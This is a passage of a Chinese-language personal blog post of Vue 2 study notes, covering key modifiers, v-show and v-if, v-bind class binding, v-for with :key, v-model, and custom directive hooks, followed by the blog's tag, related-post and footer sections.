        <span data-label-text="HTML"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="已复制！"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td><td class="rouge-code"><pre><span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"root"</span> <span class="err">@</span><span class="na">click.self=</span><span class="s">"showInfo($event,1)"</span><span class="nt">&gt;</span>
    <span class="c">&lt;!-- 原生js解决 --&gt;</span>
    <span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"text"</span> <span class="na">placeholder=</span><span class="s">"按下回车，显示输入内容"</span> <span class="err">@</span><span class="na">keyup=</span><span class="s">"showInfo"</span><span class="nt">&gt;</span> 
    <span class="c">&lt;!-- Vue添加事件修饰符 .enter --&gt;</span>
    <span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"text"</span> <span class="na">placeholder=</span><span class="s">"按下回车，显示输入内容"</span> <span class="err">@</span><span class="na">keyup.enter=</span><span class="s">"showInfo"</span><span class="nt">&gt;</span>
<span class="nt">&lt;/div&gt;</span>
</pre></td></tr></tbody></table></code></div></div>

<div class="language-js highlighter-rouge"><div class="code-header">
        <span data-label-text="JavaScript"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="已复制！"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
</pre></td><td class="rouge-code"><pre><span class="kd">const</span> <span class="nx">vm</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">Vue</span><span class="p">({</span>
    <span class="na">el</span><span class="p">:</span><span class="dl">"</span><span class="s2">#root</span><span class="dl">"</span><span class="p">,</span>
    <span class="na">data</span><span class="p">:{},</span>
    <span class="na">methods</span><span class="p">:{</span>
        <span class="nf">showInfo</span><span class="p">(</span><span class="nx">e</span><span class="p">){</span>
            <span class="c1">// if(e.keyCode !== 13) return;  原生js解决</span>
            <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="nx">e</span><span class="p">.</span><span class="nx">target</span><span class="p">.</span><span class="nx">value</span><span class="p">);</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="p">})</span>
</pre></td></tr></tbody></table></code></div></div>

<h3 id="按键别名"><span class="me-2">按键别名</span><a href="#按键别名" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<ol>
  <li>Vue中提供的 常用按键别名：</li>
</ol>

<div class="table-wrapper"><table>
  <thead>
    <tr>
      <th>按键</th>
      <th>键名</th>
      <th>按键</th>
      <th>键名</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>回车</td>
      <td>enter</td>
      <td>删除（“退格”、“删除”）</td>
      <td>delete</td>
    </tr>
    <tr>
      <td>退出</td>
      <td>esc</td>
      <td>空格</td>
      <td>space</td>
    </tr>
    <tr>
      <td>换行</td>
      <td>tab</td>
      <td> </td>
      <td> </td>
    </tr>
    <tr>
      <td>上</td>
      <td>up</td>
      <td>下</td>
      <td>down</td>
    </tr>
    <tr>
      <td>左</td>
      <td>left</td>
      <td>右</td>
      <td>right</td>
    </tr>
  </tbody>
</table></div>

<p>​		tab 将焦点从当前元素切走，没抬起来就失去焦点了，程序检测不到；使用<code class="language-plaintext highlighter-rouge">@keydown.tab</code>，一按下就检测到</p>

<ol>
  <li>
    <p>Vue中未提供的，可以使用原始keyCode绑定（不建议）、或需要转为caps-lock（两个单词组成，都小写，中间<code class="language-plaintext highlighter-rouge">-</code>隔开）</p>
  </li>
  <li>系统修饰键（用法特殊） — CTRL、alt、shift、meta
    <ol>
      <li><code class="language-plaintext highlighter-rouge">keyup</code>:  按下修饰键的同时，需要再按下另一个其他键，释放其他键，事件才会触发</li>
      <li><code class="language-plaintext highlighter-rouge">keydown</code>：按下修饰键，正常触发</li>
      <li>两个键配合触发 <code class="language-plaintext highlighter-rouge">.ctrl.y</code></li>
    </ol>
  </li>
  <li>自定义别名： <code class="language-plaintext highlighter-rouge">Vue.config.keyCodes.自定义键名 = 键码</code></li>
</ol>

<h2 id="显示绑定"><span class="me-2">显示绑定</span><a href="#显示绑定" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<h3 id="v-show"><span class="me-2">V-show</span><a href="#v-show" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<ul>
  <li>设置数据是否显示</li>
  <li><strong>DOM标签仍然存在</strong>，不能用于权限操作，样式隐藏，位置不保留</li>
  <li>与<code class="language-plaintext highlighter-rouge">&lt;template&gt;</code>组队使用，无效</li>
  <li>频繁切换使用</li>
</ul>

<h3 id="v-if"><span class="me-2">V-if</span><a href="#v-if" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<ul>
  <li>使用布尔值判断，直接作用于数据标签是否存在</li>
  <li><strong>DOM标签在false值时，直接被移除</strong>， 建议与<code class="language-plaintext highlighter-rouge">&lt;template&gt;</code>组队使用</li>
  <li>不频繁切换使用，单次判断（与v-else、v-else-if使用时不能打断）</li>
</ul>

<h2 id="绑定属性"><span class="me-2">绑定属性</span><a href="#绑定属性" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<h3 id="v-bind"><span class="me-2">V-Bind</span><a href="#v-bind" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<ol>
  <li>语法</li>
</ol>

<div class="language-html highlighter-rouge"><div class="code-header">
        <span data-label-text="HTML"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="已复制！"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td><td class="rouge-code"><pre>	// 完整写法: v-bind:属性名,简写:属性名
	<span class="nt">&lt;img</span> <span class="na">v-bind:src=</span><span class="s">'imgSrc'</span><span class="nt">&gt;</span>
	<span class="nt">&lt;img</span> <span class="na">v-bind:title=</span><span class="s">'imgTitle'</span><span class="err">+111</span><span class="nt">&gt;</span>
	<span class="nt">&lt;img</span> <span class="na">v-bind:class=</span><span class="s">"isActive?'active':''"</span><span class="nt">&gt;</span>
	<span class="nt">&lt;img</span> <span class="na">v-bind:class=</span><span class="s">"{active:isActive}"</span><span class="nt">&gt;</span>
</pre></td></tr></tbody></table></code></div></div>

<ul>
  <li>需要动态增删class，建议使用对象的方式</li>
</ul>

<ol>
  <li>
    <p>绑定方式: 对象语法(<code class="language-plaintext highlighter-rouge">:class=对象名</code>)</p>

    <ul>
      <li>对象名:
        <ol>
          <li><code class="language-plaintext highlighter-rouge">'key':value</code></li>
          <li><code class="language-plaintext highlighter-rouge">'className':boolean</code>：如果boolean值为真,则显示改类名;否则为空</li>
          <li><code class="language-plaintext highlighter-rouge">className: functionName()</code> — return className（可返回多个样式类名）</li>
        </ol>
      </li>
      <li>用法:
        <ol>
          <li>直接绑定 <code class="language-plaintext highlighter-rouge">&lt;h2 :calss="{'active':isActive}"&gt; hello &lt;/h2&gt;</code></li>
          <li>判断传入多个值 <code class="language-plaintext highlighter-rouge">&lt;h2 :calss="{'active':isActive, 'line':isLine}"&gt; hello &lt;/h2&gt;</code></li>
          <li>与普通的类同时存在 <code class="language-plaintext highlighter-rouge">&lt;h2 class='title' :class={'active':isActive}&gt; hello &lt;/h2&gt;</code></li>
          <li>将参数放入方法/计算 <code class="language-plaintext highlighter-rouge">&lt;h2 :class="classes"&gt; hello &lt;/h2&gt;</code> 。</li>
        </ol>
      </li>
    </ul>
  </li>
  <li>
    <p>绑定方式: 数组语法(<code class="language-plaintext highlighter-rouge">:class=数组</code>)</p>

    <ul>
      <li>参数:</li>
    </ul>

    <ol>
      <li>参数为<code class="language-plaintext highlighter-rouge">'active'</code>时,作为字符串</li>
      <li>参数为<code class="language-plaintext highlighter-rouge">active</code>时,作为变量</li>
    </ol>

    <ul>
      <li>用法
        <ol>
          <li>直接绑定 <code class="language-plaintext highlighter-rouge">&lt;h2 :class="[active]"&gt;Hello world&lt;/h2&gt;</code></li>
          <li>传入多个值 <code class="language-plaintext highlighter-rouge">&lt;h2：class="[active,line]"&gt;Hello world&lt;/h2&gt;</code></li>
          <li>与普通的类同时存在 <code class="language-plaintext highlighter-rouge">&lt;h2 class="title"：class="[active,line]"&gt;Hello world&lt;/h&gt;</code></li>
          <li>将参数放入方法/计算 <code class="language-plaintext highlighter-rouge">&lt;h2 class="title"：class="classes"&gt;Hello world&lt;/h2&gt;</code></li>
        </ol>
      </li>
    </ul>
  </li>
  <li>
    <p>绑定多个属性值：（引入组件需要多个配置值时）</p>

    <ol>
      <li><code class="language-plaintext highlighter-rouge">v-bind( {marginTop:5px, backgroud:#333} )</code></li>
    </ol>
  </li>
</ol>

<h2 id="列表渲染"><span class="me-2">列表渲染</span><a href="#列表渲染" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<h3 id="列表循环-v-for"><span class="me-2">列表循环 v-for</span><a href="#列表循环-v-for" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<ul>
  <li>想生成谁，就在谁身上使用for</li>
</ul>

<div class="language-html highlighter-rouge"><div class="code-header">
        <span data-label-text="HTML"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="已复制！"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre></td><td class="rouge-code"><pre><span class="nt">&lt;div</span><span class="err"> </span><span class="na">id=</span><span class="s">"root"</span><span class="nt">&gt;</span>
    <span class="nt">&lt;ul&gt;</span>
        <span class="c">&lt;!-- 【遍历数组】 --&gt;</span>
        <span class="nt">&lt;li</span><span class="err"> </span><span class="na">v-for=</span><span class="s">"(item, id) in person"</span><span class="err"> </span><span class="na">:key=</span><span class="s">"id"</span><span class="nt">&gt;</span>{{item.name}} + {{item.id}}<span class="nt">&lt;/li&gt;</span>
        <span class="c">&lt;!-- 【遍历对象】先值，后键 --&gt;</span>
        <span class="nt">&lt;li</span> <span class="na">v-for=</span><span class="s">"(value, key) in car"</span> <span class="na">:key=</span><span class="s">"key"</span><span class="nt">&gt;</span>{{key}} :: {{value}}<span class="nt">&lt;/li&gt;</span>
        <span class="c">&lt;!-- 【遍历字符串】先字母，再下标 --&gt;</span>
        <span class="nt">&lt;li</span> <span class="na">v-for=</span><span class="s">"(item, index) in str"</span> <span class="na">:key=</span><span class="s">"index"</span><span class="nt">&gt;</span>{{item}} -- {{index}}<span class="nt">&lt;/li&gt;</span>
        
    <span class="nt">&lt;/ul&gt;</span>
<span class="nt">&lt;/div&gt;</span>
</pre></td></tr></tbody></table></code></div></div>

<ul>
  <li>根据数据生成列表结构</li>
  <li>结合的数据类型可为: <strong>数组</strong>，对象，数字，字符串，迭代器</li>
  <li><code class="language-plaintext highlighter-rouge">(item,index) in 数据</code> 可自动生成数据个数的列表标签,内容为item,索引以0开始</li>
  <li>在标签结构内，循环参数可重复使用(在作用域内)</li>
  <li>响应式: 数组长度的更新同步在页面上</li>
</ul>

<h3 id="-key"><span class="me-2">! :key</span><a href="#-key" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>key 指导Vue的虚拟DOM算法diff时，区别是不同的元素，从而避免被认为重复对象而被移除</p>

<ul>
  <li>
    <p>key给Vue虚拟DOM算法diff使用，生成真实的DOM时<code class="language-plaintext highlighter-rouge">:key</code>会被删除掉</p>
  </li>
  <li>
    <p>index作为key时，涉及逆序插入、逆序删除元素时，</p>
  </li>
</ul>

<ol>
  <li>
    <p>结构中如果有 <u>输入类的DOM</u> 会产生歧义，产生错误DOM更新</p>
  </li>
  <li>
    <p>导致没有必要的真实DOM更新</p>

    <p>如果不涉及破坏顺序的操作，仅用于渲染列表展示，可以使用<code class="language-plaintext highlighter-rouge">:key = "index"</code></p>
  </li>
</ol>

<p><a href="http://127.0.0.1:4000/../assets/img/VueBase/遍历列表时key的作用-index为什么会出错.jpg" class="popup img-link  shimmer"><img src="http://127.0.0.1:4000/../assets/img/VueBase/遍历列表时key的作用-index为什么会出错.jpg" alt="遍历列表时key的作用-index为什么会出错" loading="lazy"></a></p>

<h2 id="数据绑定"><span class="me-2">数据绑定</span><a href="#数据绑定" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<h3 id="单项数据绑定-v-bind"><span class="me-2">单项数据绑定 v-bind</span><a href="#单项数据绑定-v-bind" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>​	页面改变值，不会影响Vue.data中的值；Vue.data中的值如果改变，页面的值也会动态绑定</p>

<h3 id="双向数据绑定-v-model"><span class="me-2">双向数据绑定 V-model</span><a href="#双向数据绑定-v-model" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>​	页面改变值，会影响Vue.data的值；同样相关的页面也会变化</p>

<ul>
  <li>只能应用于 <strong>输入类元素</strong> ，（有value值的元素：input等）获取和设置<strong>表单</strong>元素的值（双向数据绑定）</li>
  <li>简写：<code class="language-plaintext highlighter-rouge">v-model="message</code>” ，直接等于变量名<code class="language-plaintext highlighter-rouge">v-model:value="message"</code></li>
  <li>绑定的数据和表达元素的值相关联</li>
</ul>

<h2 id="自定义指令"><span class="me-2">自定义指令</span><a href="#自定义指令" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<ol>
  <li>
    <p>命名：</p>

    <ol>
      <li>
        <p>调用时：使用 <code class="language-plaintext highlighter-rouge">v-XXX</code></p>

        <p>​	多个单词组成时，不识别大写字母，<strong>使用 - 分隔</strong></p>
      </li>
      <li>
        <p>定义时：不用加 <code class="language-plaintext highlighter-rouge">v- </code>， 直接<code class="language-plaintext highlighter-rouge">XXX</code></p>

        <p>​	多个单词组成时，使用 <strong>‘字段串’</strong> 包起来表示</p>
      </li>
    </ol>
  </li>
  <li>
    <p>this指向 — directives的this 都指向window</p>

    <p>使用Vue中的数据，需要从绑定的指令中传过来</p>
  </li>
  <li>
    <p>钩子函数：</p>

    <ol>
      <li>
        <p><strong><code class="language-plaintext highlighter-rouge">bind</code></strong>：只调用一次，指令第一次绑定到元素时调用。</p>

        <ul>
          <li>
            <p>（在内存中建立关系）此时的元素还未加载到页面，许多操作无效</p>
          </li>
          <li>
            <p>可以设置 样式、值、绑定方法等</p>
          </li>
        </ul>
      </li>
      <li>
        <p><strong><code class="language-plaintext highlighter-rouge">inserted</code></strong>：被绑定元素插入父节点时调用 (仅保证父节点存在，但<u>不一定已被插入文档</u>中)。</p>

        <ul>
          <li>可以设置 获取焦点、操作父元素等</li>
        </ul>
      </li>
      <li>
        <p><strong><code class="language-plaintext highlighter-rouge">update</code></strong>：所在组件的 VNode 更新时调用，<strong>但是可能发生在其子 VNode 更新之前</strong>。</p>

        <ul>
          <li>
            <p>将覆盖 插入页面时的指令效果</p>
          </li>
          <li>
            <p>再次执行时，元素已经加载到页面上了</p>
          </li>
        </ul>
      </li>
      <li>
        <p><code class="language-plaintext highlighter-rouge">componentUpdated</code>：指令所在组件的 VNode <strong>及其子 VNode</strong> 全部更新后调用。</p>
      </li>
      <li>
        <p><code class="language-plaintext highlighter-rouge">unbind</code>：只调用一次，指令与元素解绑时调用。</p>
      </li>
    </ol>
  </li>
  <li>
    <p>传入的参数</p>

    <ol>
      <li><strong><code class="language-plaintext highlighter-rouge">element</code></strong>：指令所绑定的元素，可以用来直接操作 DOM。</li>
      <li><code class="language-plaintext highlighter-rouge">binding</code> ：一个对象，包含以下属性：
        <ul>
          <li><code class="language-plaintext highlighter-rouge">name</code>：指令名，不包括 <code class="language-plaintext highlighter-rouge">v-</code> 前缀。</li>
          <li><strong><code class="language-plaintext highlighter-rouge">value</code></strong>：指令的绑定值
            <ul>
              <li>📜 保存传入的JavaScript 对象字面量，<code class="language-plaintext highlighter-rouge">{ color: 'white' }</code> — binding.value.color 取值</li>
            </ul>
          </li>
          <li><code class="language-plaintext highlighter-rouge">expression</code>：字符串形式的指令表达式。例如 <code class="language-plaintext highlighter-rouge">v-my-directive="1 + 1"</code> 中，表达式为 <code class="language-plaintext highlighter-rouge">"1 + 1"</code>。</li>
          <li><code class="language-plaintext highlighter-rouge">arg</code>：传给指令的参数，可选。例如 <code class="language-plaintext highlighter-rouge">v-my-directive:foo</code> 中，参数为 <code class="language-plaintext highlighter-rouge">"foo"</code>。</li>
          <li><code class="language-plaintext highlighter-rouge">modifiers</code>：一个包含修饰符的对象。例如：<code class="language-plaintext highlighter-rouge">v-my-directive.foo.bar</code> 中，修饰符对象为 <code class="language-plaintext highlighter-rouge">{ foo: true, bar: true }</code>。</li>
          <li><code class="language-plaintext highlighter-rouge">oldValue</code>：指令绑定的前一个值，仅在 <code class="language-plaintext highlighter-rouge">update</code> 和 <code class="language-plaintext highlighter-rouge">componentUpdated</code> 钩子中可用。无论值是否改变都可用</li>
        </ul>
      </li>
      <li><code class="language-plaintext highlighter-rouge">vnode</code>：Vue 编译生成的虚拟节点。移步 <a href="https://v2.cn.vuejs.org/v2/api/#VNode-接口">VNode API</a> 来了解更多详情。</li>
      <li><code class="language-plaintext highlighter-rouge">oldVnode</code>：上一个虚拟节点，仅在 <code class="language-plaintext highlighter-rouge">update</code> 和 <code class="language-plaintext highlighter-rouge">componentUpdated</code> 钩子中可用。</li>
    </ol>
  </li>
</ol>

<div class="language-js highlighter-rouge"><div class="code-header">
        <span data-label-text="JavaScript"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="已复制！"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre></td><td class="rouge-code"><pre><span class="c1">// Vue 全局定义</span>
<span class="nx">Vue</span><span class="p">.</span><span class="nf">directive</span><span class="p">(</span><span class="dl">'</span><span class="s1">指令名</span><span class="dl">'</span><span class="p">,</span><span class="nx">configObj</span><span class="p">)</span>
<span class="nx">Vue</span><span class="p">.</span><span class="nf">directive</span><span class="p">(</span><span class="dl">'</span><span class="s1">指令名</span><span class="dl">'</span><span class="p">,</span><span class="nx">callBackFunction</span><span class="p">)</span>

<span class="c1">// 当前组件 局部定义</span>
<span class="k">new</span> <span class="nc">Vue</span><span class="p">({</span>
    <span class="na">directives</span><span class="p">:</span> <span class="p">{</span>
        <span class="na">big</span><span class="p">:</span> <span class="nf">function </span><span class="p">(</span><span class="nx">element</span><span class="p">,</span> <span class="nx">binding</span><span class="p">)</span> <span class="p">{}</span>  <span class="c1">// 函数形式，默认只用 bind + update</span>
        <span class="nl">fbind</span><span class="p">:</span> <span class="p">{}</span> <span class="c1">// 对象形式，可以配置多钩子</span>
    <span class="p">}</span> 
<span class="p">})</span> 
</pre></td></tr></tbody></table></code></div></div>

<ul>
  <li>
    <p>函数形式 与 对象形式的区别 — 没有inserted</p>

    <ul>
      <li>
        <p>获得焦点，需要该结构已经加载到页面上；否则无法获得焦点</p>
      </li>
      <li>
        <p>控制父元素，需要该结构已经加载到页面上；否则不知道谁是父元</p>

        <p>有一些操作，需要在该结构挂载到DOM上，才能有上下文环境操作</p>
      </li>
    </ul>
  </li>
</ul>

  </div>

  <div class="post-tail-wrapper text-muted">
    <!-- categories -->
    
      <div class="post-meta mb-3">
        <i class="far fa-folder-open fa-fw me-1"></i>
        
          <a href="/categories/vue2/">Vue2</a>
      </div>
    

    <!-- tags -->
    
      <div class="post-tags">
        <i class="fa fa-tags fa-fw me-1"></i>
        
          <a
            href="/tags/vue2/"
            class="post-tag no-text-decoration"
          >Vue2</a>
        
          <a
            href="/tags/vuebase/"
            class="post-tag no-text-decoration"
          >VueBase</a>
        
      </div>
    

    <div
      class="
        post-tail-bottom
        d-flex justify-content-between align-items-center mt-5 pb-2
      "
    >
      <div class="license-wrapper">
        
          

          本文由作者按照 
        <a href="https://creativecommons.org/licenses/by/4.0/">
          CC BY 4.0
        </a>
         进行授权
        
      </div>

      <!-- Post sharing snippet -->

<div class="share-wrapper d-flex align-items-center">
  <span class="share-label text-muted me-1">分享</span>
  <span class="share-icons">
    
    
    

    
      
      <a
        href="https://twitter.com/intent/tweet?text=Vue%E6%8C%87%E4%BB%A4%20-%20%E5%AE%89%E7%BD%AE%E5%B1%8B&url=http%3A%2F%2Flocalhost%3A4000%2Fposts%2FVue%25E6%258C%2587%25E4%25BB%25A4%2F"
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="Twitter"
        target="_blank"
        rel="noopener"
        aria-label="Twitter"
      >
        <i class="fa-fw fa-brands fa-square-x-twitter"></i>
      </a>
    
      
      <a
        href="https://www.facebook.com/sharer/sharer.php?title=Vue%E6%8C%87%E4%BB%A4%20-%20%E5%AE%89%E7%BD%AE%E5%B1%8B&u=http%3A%2F%2Flocalhost%3A4000%2Fposts%2FVue%25E6%258C%2587%25E4%25BB%25A4%2F"
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="Facebook"
        target="_blank"
        rel="noopener"
        aria-label="Facebook"
      >
        <i class="fa-fw fab fa-facebook-square"></i>
      </a>
    
      
      <a
        href="https://t.me/share/url?url=http%3A%2F%2Flocalhost%3A4000%2Fposts%2FVue%25E6%258C%2587%25E4%25BB%25A4%2F&text=Vue%E6%8C%87%E4%BB%A4%20-%20%E5%AE%89%E7%BD%AE%E5%B1%8B"
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="Telegram"
        target="_blank"
        rel="noopener"
        aria-label="Telegram"
      >
        <i class="fa-fw fab fa-telegram"></i>
      </a>
    

    <button
      id="copy-link"
      aria-label="Copy link"
      class="btn small"
      data-bs-toggle="tooltip"
      data-bs-placement="top"
      title="分享链接"
      data-title-succeed="链接已复制！"
    >
      <i class="fa-fw fas fa-link pe-none"></i>
    </button>
  </span>
</div>

    </div>
    <!-- .post-tail-bottom -->
  </div>
  <!-- div.post-tail-wrapper -->
</article>


            
          </main>

          <!-- panel -->
          <aside aria-label="Panel" id="panel-wrapper" class="col-xl-3 ps-2 mb-5 text-muted">
            <div class="access">
              <!-- Get the last 5 posts from lastmod list. -->















              <!-- The trending tags list -->















  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        



  <section>
    <h2 class="panel-heading">热门标签</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/javascriptbase/">javascriptBase</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/vue2/">Vue2</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/vuebase/">VueBase</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/computernetwork/">computerNetwork</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/javascriptthread/">javascriptThread</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/thread/">Thread</a>
      
    </div>
  </section>


            </div>

            
              
              
            
          </aside>
        </div>

        <div class="row">
          <!-- tail -->
          <div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              
              <!-- Recommend the other 3 posts according to the tags and categories of the current post. -->

<!-- The total size of related posts -->


<!-- An random integer that bigger than 0 -->


<!-- Equals to TAG_SCORE / {max_categories_hierarchy} -->














  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
    
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  











  <aside id="related-posts" aria-labelledby="related-label">
    <h3 class="mb-4" id="related-label">相关文章</h3>
    <nav class="row row-cols-1 row-cols-md-2 row-cols-xl-3 g-4 mb-4">
      
        <article class="col">
          <a href="/posts/%E7%BB%84%E4%BB%B6%E4%BA%A4%E4%BA%92/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1696348800"
  data-df="YYYY/MM/DD"
  
>
  2023/10/04
</time>

              <h4 class="pt-0 my-2">组件交互</h4>
              <div class="text-muted">
                <p>
                  





                  父传子 props

​	父组件传递给子组件的数据，子组件通过props接受后，不能直接更改该值。这是因为：


  所有的 prop 都使得其父子 prop 之间形成了一个单向下行绑定：父级 prop 的更新会向下流动到子组件中
  但是反过来则不行。这样会防止从子组件意外变更父级组件的状态，从而导致你的应用的数据流向难以理解


Step 1 — 父亲建立关系

import Child...
                </p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/Vue%E8%B7%AF%E7%94%B1/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1696608000"
  data-df="YYYY/MM/DD"
  
>
  2023/10/07
</time>

              <h4 class="pt-0 my-2">Vue路由</h4>
              <div class="text-muted">
                <p>
                  





                  官方文档–Vue.Router

实现组件之间的跳转：通过路由模块，将指定的组件显示在路由视图中，实现一个VUE组件中其他组件相互切换

安装路由模块


  已有项目添加npm
  新建项目添加npm install vue-router -s
  安装依赖


route，routes，router

在使用了vue-router的应用中，路由对象会被注入每个组件中，赋值为this.ro...
                </p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/Vue%E5%AE%9E%E4%BE%8B/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1696953600"
  data-df="YYYY/MM/DD"
  
>
  2023/10/11
</time>

              <h4 class="pt-0 my-2">Vue实例</h4>
              <div class="text-muted">
                <p>
                  





                  两个参数

​	【Vue实例与对象的关系是 1：1】一个实例接管一个容器


  
    后面的容器不生效、重复的Vue同挂载实例会报错
  
  
    容器只能使用Vue实例提供的内容

    【v.$mount(el, data); 在已经声明的Vue实例追加挂载】
  



  el：&quot;挂载点&quot; 或者 document.getElementById(&#39;id名&#39;)  （字符串类...
                </p>
              </div>
            </div>
          </a>
        </article>
      
    </nav>
  </aside>
  <!-- #related-posts -->


            
              
              <!-- Navigation buttons at the bottom of the post. -->

<nav class="post-navigation d-flex justify-content-between" aria-label="Post Navigation">
  
  

  
    <a
      href="/posts/Vue%E5%AE%9E%E4%BE%8B/"
      class="btn btn-outline-primary"
      aria-label="上一篇"
    >
      <p>Vue实例</p>
    </a>
  

  
    <a
      href="/posts/%E8%AE%A1%E7%AE%97%E5%B1%9E%E6%80%A7%E5%92%8C%E7%9B%91%E8%A7%86%E5%B1%9E%E6%80%A7/"
      class="btn btn-outline-primary"
      aria-label="下一篇"
    >
      <p>计算属性和监视属性</p>
    </a>
  
</nav>

            
              
              <!--  The comments switcher -->


            

            <!-- The Footer -->

<footer
  aria-label="Site Info"
  class="
    d-flex flex-column justify-content-center text-muted
    flex-lg-row justify-content-lg-between align-items-lg-center pb-lg-3
  "
>
  <p>
    ©
    <time>2024</time>
    <a href="">Ana-Anan</a>.
    
      <span
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="除非另有说明，本网站上的博客文章均由作者按照知识共享署名 4.0 国际 (CC BY 4.0) 许可协议进行授权。"
      >保留部分权利。</span>
    
  </p>

  <p>本站采用 <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> 主题 <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a>
  </p>
</footer>

          </div>
        </div>

        <!-- The Search results -->

<div id="search-result-wrapper" class="d-flex justify-content-center unloaded">
  <div class="col-11 content">
    <div id="search-hints">
      <!-- The trending tags list -->















  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        



  <section>
    <h2 class="panel-heading">热门标签</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/javascriptbase/">javascriptBase</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/vue2/">Vue2</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/vuebase/">VueBase</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/computernetwork/">computerNetwork</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/javascriptthread/">javascriptThread</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/thread/">Thread</a>
      
    </div>
  </section>


    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>

      </div>

      <aside aria-label="Scroll to Top">
        <button id="back-to-top" type="button" class="btn btn-lg btn-box-shadow">
          <i class="fas fa-angle-up"></i>
        </button>
      </aside>
    </div>

    <div id="mask"></div>

    
      <aside
  id="notification"
  class="toast"
  role="alert"
  aria-live="assertive"
  aria-atomic="true"
  data-bs-animation="true"
  data-bs-autohide="false"
>
